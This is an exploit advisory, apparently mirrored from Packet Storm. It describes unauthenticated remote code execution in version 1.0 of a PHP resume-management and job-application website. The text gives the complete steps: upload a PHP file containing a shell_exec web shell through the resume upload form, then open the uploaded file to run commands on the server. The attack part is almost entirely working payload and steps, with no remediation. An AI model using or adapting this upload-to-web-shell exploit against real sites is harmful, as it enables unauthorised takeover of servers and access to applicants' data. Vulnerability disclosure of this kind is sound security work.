## https://sploitus.com/exploit?id=PACKETSTORM:160751
# Exploit Title: Resumes-management-and-job-application-website unauthenticated RCE  
# Date: 3/1/2021  
# Exploit Author: Arnav Tripathy  
# Vendor Homepage: https://egavilanmedia.com  
# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/  
# Version: 1.0  
# Tested on: linux/lamp  
  
Submit rce.php through the resume file upload, without authenticating. Contents of rce.php:  
<?php  
$output = shell_exec('whoami');  
echo "<h1>$output</h1>";  
?>  
  
Navigate to http://localhost/Resumes Management and Job Application Website/files/rce.php  
  
You will get the output of whoami.